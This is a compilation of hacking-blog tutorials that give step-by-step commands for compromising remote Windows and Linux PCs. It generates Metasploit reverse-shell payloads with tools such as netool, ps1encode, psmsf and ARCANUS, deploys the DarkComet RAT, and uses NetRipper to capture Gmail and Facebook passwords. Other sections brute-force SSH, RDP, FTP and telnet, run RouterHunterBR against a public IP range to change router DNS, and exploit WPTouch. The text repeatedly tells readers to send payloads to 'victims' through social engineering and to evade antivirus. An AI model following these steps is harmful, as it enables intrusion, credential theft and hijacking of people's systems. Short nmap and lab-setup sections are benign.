NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

Open your kali Linux terminal and type the following command

https://github.com/NytroRST/NetRipper.git

Now install the netripper in kali linux step by step process is given below.

• cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
• mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
• g++ -Wall netripper.cpp -o netripper
• cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
• cd ../Release
• cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Now Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

 Now bypass the UAC visit

 http://www.hackingarticles.in/bypass-uac-protection-of-remote-windows-pc-in-memory-injection/

Now search netripper

type use post/windows/gather/netripper

msf exploit (netripper)>set verbose true

msf exploit (netripper)>set processnames firefox.exe

msf exploit (netripper)>set session 2

msf exploit (netripper)>exploit

Now it will automatically create a NetRripper  folder in the target pc on following location

C:\Users\RAJ\AppData\Local\Temp\NetRipper

You have access to the victims PC. Use “Sessions” and the Session number to connect to the session. And Now Type “sessions –id ID“and type shell to get command prompt of victim pc.

The captured data is saved by default in TEMP (e.g. C:\Users\RAJ\AppData\Local\Temp\NetRipper).

Now goto the above path by using the command.

C:\windows\system32>cd  C:\Users\RAJ\AppData\Local\Temp\NetRipper

Now type Dir command and it will show the list of text files.

In our example, the output file named 1004_firefox.exe_PR_Write.txt may contain the password.

We can read that text file from command line using type command.

Type 1004_firefox_.exe_PR_Write.txt

Now press ctrl +shift+ f it will open find open & type &pass.

Now you can find the password of gmail or facebook as shown below.

The post Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool appeared first on Hacking Articles.

netool.sh is a script in bash to automate frameworks like metasploit, Nmap, Driftnet, SSLstrip, and Ettercap MITM attacks, Retrieves metadata, geo-location of target, as the hability to capture SSL passwords under MITM, sniff URL accessed by target machine, changes hostname, change IP and Mac-Address to decoy scans, capture pictures of web-browser surfing (diftnet), perform TCP/UDP packets manipulation using etter.filters, DoS attacks on local/external network, webcrawler.

Open your kali Linux terminal and type the following command

 git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali

Now a pop up will open click on yes

Again a pop up will open click on yes

Open terminal and type ./netool.sh and press enter to continue

Now it will ask you for your choice press 8 now a pop up will open click on yes

You can see lots of attacking option choose 21 Windows.exe payloads

Now a pop up will open Enter IP address of your kali Linux pc And click OK.

Now it will ask for port no. Enter the port no.  Such as 4567 and click OK.

Entering the payload name and click OK

Now it will show the path where payload will be stored and ask how to deliver, choose multi-handler. Click OK.

Now select default listenner option and click ok

Now it will execute TCP handler on 192.168.0.103 and start the payload handler.

Now it will show a file with name soft.exe now send your exe files to victim using any social engineering technique.

Now when the victim will use exe you will get the meterpreter of victim PC.

The post Hack Remote PC with Nettool MitM Pentesting Toolkit appeared first on Hacking Articles.

First open your kali Linux application tab in Exploitation Tools and then chose SET Toolkit

Now press enter

Now choose option 2, “Fast-Track Penetration Testing” and enter

Then choose option 2, “Custom Exploits” and Enter

After that choose option 4, “RDP use after free –Denial of Service” and Enter

Now Enter the IP address of remote pc you want to be crash

The post Denial of Service Attack on Network PC using SET Toolkit appeared first on Hacking Articles.

Use to generate and encode a powershell based metasploit payloads.

 Available output types:

• raw (encoded payload only – no powershell run options)
• cmd (for use with bat files)
• vba (for use with macro trojan docs)
• vbs (for use with vbs scripts)
• war (tomcat)
• exe (executable) requires MinGW – i586-mingw32msvc-gcc [apt-get install mingw32]
• java (for use with malicious java applets)
• js (javascript)
• php (for use with php pages)
• hta (HTML applications)
• cfm (for use with Adobe ColdFusion)
• aspx (for use with Microsoft ASP.NET)
• lnk (windows shortcut – requires a website to stage the payload)

Open your kali Linux terminal and type the following command

https://github.com/CroweCybersecurity/ps1encode.git

./ps1encode.rb  -I 192.168.0.140 –p 4567 –a windows/meterpreter/reverse_https –t cmd

raw =>  base64 powershell code only without the run options
cmd =>  default payload – use with bat files or for an easy copy + paste + shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that will call out powershell and inject code into it. Requires MinGW to compile
java => for use with java applet attacks (details on this and the setup instructions later)
php =>  for use with PHP sites – an alternative to using web shells
hta => HTML Applications –  good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion. Similar to PHP, this is an alternative to using a web shell

Copy the highlighted text shown in below window and save in bat format and send it to the victim

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.140

exploit

Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

The post Exploit Remote Windows PC using ps1encodeTool appeared first on Hacking Articles.

The RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The script explores four vulnerabilities in routers

01 – Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35995/

02 – D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35917/

03 – LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit

reference: http://www.exploit-db.com/exploits/36014/

04 – D-Link DSL-2640B Unauthenticated Remote DNS Change Exploitx

reference: http://1337day.com/exploit/23302/

Open your kali Linux terminal and type the following command

https://github.com/googleinurl/RouterHunterBR.git

./routerhunter.py  –range ‘182.75.*.*’ –dns1  8.8.8.8 –dns2 8.8.4.8

Legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

The post Find the Vulnerable Router on Internet using RouterhunterBR appeared first on Hacking Articles.

open your kali Linux terminal and type the following command

git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali

Open terminal and type ./netool.sh and press enter to continue

Now it will ask you for your choice press 8 now a pop up will open click on yes

You can see lots of attacking option choose 4 Powershell (Relik)

Now a pop up will open choose a powershell payload (powershell.hta) then click OK.

again a pop up will open Enter IP address of your kali Linux pc And click OK.

Now it will ask for port no. Enter the port no.  Such as 4444 and click OK.

Entering the Target IP Address and click and press enter

Click on yes to start a Listner

Now it will execute TCP handler on 192.168.0.103 and start the payload handler.

When Victim Machine browsing to your link  it will download launcher.hta file when victim click on it you will get the meterpreter session .

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt

The post Exploit Remote Windows PC using HTA Attack with Net Tools appeared first on Hacking Articles.

Download DarkcometRAT From here after downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe

First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)

In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist

In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal

Now save it on your desktop.

Again open DARKCOMET RAT and select listen to new port option

Now enter the port number used in the form above and click on Listen

Now hack victim’s PC using Metasploit How to Hack Remote PC

Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet

Upload /root/Desktop/updates.exe d:\\

Now type shell to get the command prompt of victim’s PC. And run uploaded exe file

Now you can get the session of victim’s PC. See the screenshot below:

Click on system info you can see the whole system information of victim’s PC

The post Hack Remote PC using Darkcomet RAT with Metasploit appeared first on Hacking Articles.

PSMSF can help us generate payload or files used in cmd console/browser/.. With Metasploit-Framework. If you are similar to windows cmd console, you can use the results in different areas.

Open your kali Linux terminal and type the following command

https://github.com/all3g/psmsf.git

Now type following command to create payload

python psmsf.py –attacktype ps –payload windows/meterpreter/reverse_tcp –lhost 192.168.0.140 –lport 4444

Now it will show a file with name powershell_hacking.bat and powershell_msf.rc now send your bat files to victim using any social engineering technique.

Starts a metasploit-framework listeners, type msfconsole -r powershell_msf.rc

Now when the victim will use bat file you will get the meterpreter of victim PC.

The post Hack Remote Windows 10 PC using psmsf appeared first on Hacking Articles.

This python script generates metasploit shellcode payloads in Windows batch file format, powershell script format, and MS-Office visual basic macro format. The default metasploit payloads are:

• windows/meterpreter/reverse_tcp
• windows/x64/meterpreter/reverse_tcp

If TCP port 443 is specified, the script will automatically generate an HTTPS payload also using ‘windows/meterpreter/reverse_https’. The script will accept multiple TCP ports which are comma delimitered.

Open your kali Linux terminal and type the following command

git clone https://bitbucket.org/jsthyer/psploitgen.git

Now type following command to create payload

./psploitgen.py –lhost 192.168.0.140 –lport 4444 –payload windows/x64/meterpreter/reverse_tcp

Now it will show a file with extension .bat and send your bat files to victim using any social engineering technique

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

The post Exploit Remote Windows PC using PSploitGen appeared first on Hacking Articles.

SSH Login Check Scanner

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/ssh/ssh_login

msf exploit (ssh_login)>set userpass_file /usr/share/msf/data/wordlist/root_pass.txt

msf exploit (ssh_login)>set rhosts 192.168.0.103 (IP of Remote Host)

msf exploit (ssh_login)set verbose true

msf exploit (ssh_login)>exploit

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

 Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l root –P /root/Desktop/pass.txt 192.168.0.103 ssh

• -l indicates a single username (use -L for a username list)
• -P indicates use the following password list
• ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.103

Protocol: ssh

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select yourPasswords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

 Run the following command

ncrack –user root –P /root/Desktop/pass.txt 192.168.0.103:22

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post 4 Ways to Hack SSH Service on Remote PC appeared first on Hacking Articles.

Basic Scanning Techniques

 So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning.

Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

Open: This indicates that an application is listening for connections on this port.

• Closed: This indicates that the probes were received but there is no application listening on this port.
• Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
• Unfiltered: This indicates that the probes were received but a state could not be established.
• Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.
• Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open kali linux terminal and type nmap to serach all nmap commands

 Find All Connected PC (Ping Scan)

 The -Sp option for a ping only scan. It will be more useful when you have a group of IP addresses and you don’t know which one is reachable.

 nmap -sP -T4 192.168.0.1/24

 Note:

-T : Used to change speed of scan. Slow scan yields Better results

Multiple IP Scan

 nmap -sn 192.168.0.1/24

TCP Ports Scan

 TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports in Remote PC.

Sinlge IP Scan

nmap -sT 192.168.0.102

Multiple IP Scan

 nmap -sT 192.168.0.1/24

Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102

Multiple Hosts Scanning

 nmap -sV -T4 192.168.0.1/24

Detect Operating System

In this scan you can find the Installed Operating System in the Network PC.

 Single Host Scanning

 nmap -O 192.168.0.102

Multiple Hosts Scanning

 nmap -O -T4 192.168.0.1/24

Detect Protocol

In this scan you can find the PROTOCOL, STATE, SERVICE in the Network PC.

nmap -sO -T4 192.168.0.1/24

Aggressive Scan (Also Work for Trace route)

 For Single Host

The aggressive scan selects most commonly used options  it is simple alternative to writing long strings. It will also work for traceroute, etc.

nmap -A 192.168.0.102

Multiple Hosts Scanning

 nmap -A -T4 192.168.0.1/24

UDP Ping Scan

The UDP scan only on udp ping scans on the target. . It will show you all open UDP ports in Remote PC.

 nmap –sU -T4 192.168.0.102

Syn Scan

Complete 2 step in 3 way handshake. No chance of closing or crashing target. Undetected by older System. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap –sS 192.168.0.113

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post Network Scanning using NMAP (Beginner Guide) appeared first on Hacking Articles.

Remote Desktop run on port 3389 so in order to discover information regarding the RDP we need to execute the following script:

Nmap –sV 192.168.0.100

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.100

Protocol: rdp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your Passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Open kali linux terminal Run the following command

 hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

• -l indicates a single username (use -L for a username list)
• -P indicates use the following password list
• ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

To connect to victim using remote desktop, we can use rdesktop program

rdesktop -u <username> -p <password> <ip-address-target>

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post 2 Ways to Hack Remote Desktop Password using kali Linux appeared first on Hacking Articles.

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (ftp_login)>set rhosts 192.168.1.35 (IP of Remote Host)

msf exploit (ftp_login)>set verbose true

msf exploit (ftp_login)> exploit

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.1.35

Protocol: ftp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select yourPasswords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l msfadmin –P /root/Desktop/pass.txt 192.168.1.35 ftp

• -l indicates a single username (use -L for a username list)
• -P indicates use the following password list
• ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack —user msfadmin –P /root/Desktop/pass.txt 192.168.0.1.35:21

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.35 -u msfadmin –P /root/Desktop/pass.txt –M ftp

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post 5 Ways to Hack FTP Service on Remote PC appeared first on Hacking Articles.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Copy the highlighted text shown In below window and send it to the victim

When the victim paste the highlighted text in terminal and run it ,you get the whole access of victim system

The post Hack Remote Linux PC using PHP File appeared first on Hacking Articles.

Open your kali Linux terminal and type the following command

git clone https://github.com/leebaird/discover.git

 Open terminal and type ./discover.sh and press enter to continue

Now it will show you various options of tools with target OS and format. In my case I am selecting option 13 and press enter

Again it will show you various options payloads. In my case I am selecting option 6 and press enter

Enter IP address of your kali linux pc. And click OK.

Now it will ask for port no. Enter the port no.  Such as 4444 and click OK.

Now it will store a file with name payload-windows-x86_64.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.22

exploit

Now send your EXE files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

The post Hack Remote Windows 10 PC using Discover Tool appeared first on Hacking Articles.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/telnet/telnet_login

msf exploit (telnet_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (telnet_login)>set rhosts 192.168.0.131 (IP of Remote Host)

msf exploit (telnet_login)>set verbose true

msf exploit (telnet_login)> exploit

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l msfadmin –P /root/Desktop/pass.txt 192.168.0.131 telnet

• -l indicates a single username (use -L for a username list)
• -P indicates use the following password list
• ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.35 -u msfadmin –P /root/Desktop/pass.txt –M telnet

Now connect victim pc using telnet command  result are shown below.

telnet 192.168.0.131

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post 3 Ways to Hack Telnet Passsword of Remote PC appeared first on Hacking Articles.

Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It’s loaded with common web vulnerabilities and various levels of complexity.

Open your kali Linux terminal and type the following command

sudo apt-get install git

Now type

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

 source ~/.bashrc

In next type

nvm install 5.3.0

nvm use 5.3.0

git clone https://github.com/quantumfoam/DVNA.git

cd DVNA/

npm set progress=false

In next step type

npm install

Now type

node dvna.js

Navigate to http://localhost:3000/

The post Web Hacking Lab Setup using DVNA in Kali Linux appeared first on Hacking Articles.

Open your kali Linux terminal and type the following command

https://github.com/wayneaswilliams/msfvenom_custom_encoding.git

Now type following command to create payload

./msfven.sh

 Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4445 and press enter

In next step use payloads e.g.windows/meterpreter/reverse_tcp and press enter

Now it will show a file with name tcp_445.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

 Now send your exe files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

The post Exploit Windows 10 PC using msfven.sh Script appeared first on Hacking Articles.

ARCANUS is a customized payload generator/handler for penetration testing only

WHY USE ARCANUS ?

• İn pen.test world Metasploit is the mainstream for this job, but ARCANUS has few advantages.
• ARCANUS generates a unique payload for windows and linux systems that can’t be detected with any antivirus programs. (Don’t give any samples to Virus Total or similar web sites to keep it that way ;D )
• It has extra modules for exploitation. Ordinary reverse shell payloads offers only remote access to command prompts but ARCANUS has few special commands like ” £persistence, £download, £upload, £meterpreter…”
• It is silent and continuous. Metasploit payloads attempts to connect remote host just for ones but when you execute ARCANUS payloads they makes connection attemps every 5 second silently in background.
• It is flexible. If you want to use it with Metasploit it has a meterpreter module for executeing meterpreter shellcodes on remote machine.
• Platform independent ! ARCANUS works both on windows and linux.

Open your kali Linux terminal and type the following command

https://github.com/EgeBalci/ARCANUS.git

Open terminal and type ./ARCANUS and press enter to continue

Now it will ask you for your choice press 2 now a pop up will open click on enter

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4444 and press enter

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Go to https://www.virustotal.com/en

Click the “Choose File” button. Navigate to and double-click the payload.exe. Appears in the “Choose File” box, as shown below:

Now when the victim opens payload.exe you can access of windows command prompt. Now run SystemInfo in prompt, will tell you all you need to know about your computer system

When we need to retrieve a file from the target we use the download command

£download “Filename” /root/Your Path

For More Command visit here

The post Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus) appeared first on Hacking Articles.

The WordPress WPTouch plugin contains authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses it’s own file upload mechanism instead of the wordpress api it’s possible to upload any file type. The user provided does not need special rights, and users with “Contributor” role can be abused.

 Exploit Targets

Wp touch 3.4.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_wptouch_file_upload

msf exploit (wp_wptouch_file_upload)>set targeturi /wordpress

msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_wptouch_file_upload)>set username admin

msf exploit (wp_wptouch_file_upload)>set password admin123

msf exploit (wp_wptouch_file_upload)>set rport 80

msf exploit (wp_wptouch_file_upload)>exploit

The post Exploit Web Server using WordPress WPTouch Authenticated File Upload appeared first on Hacking Articles.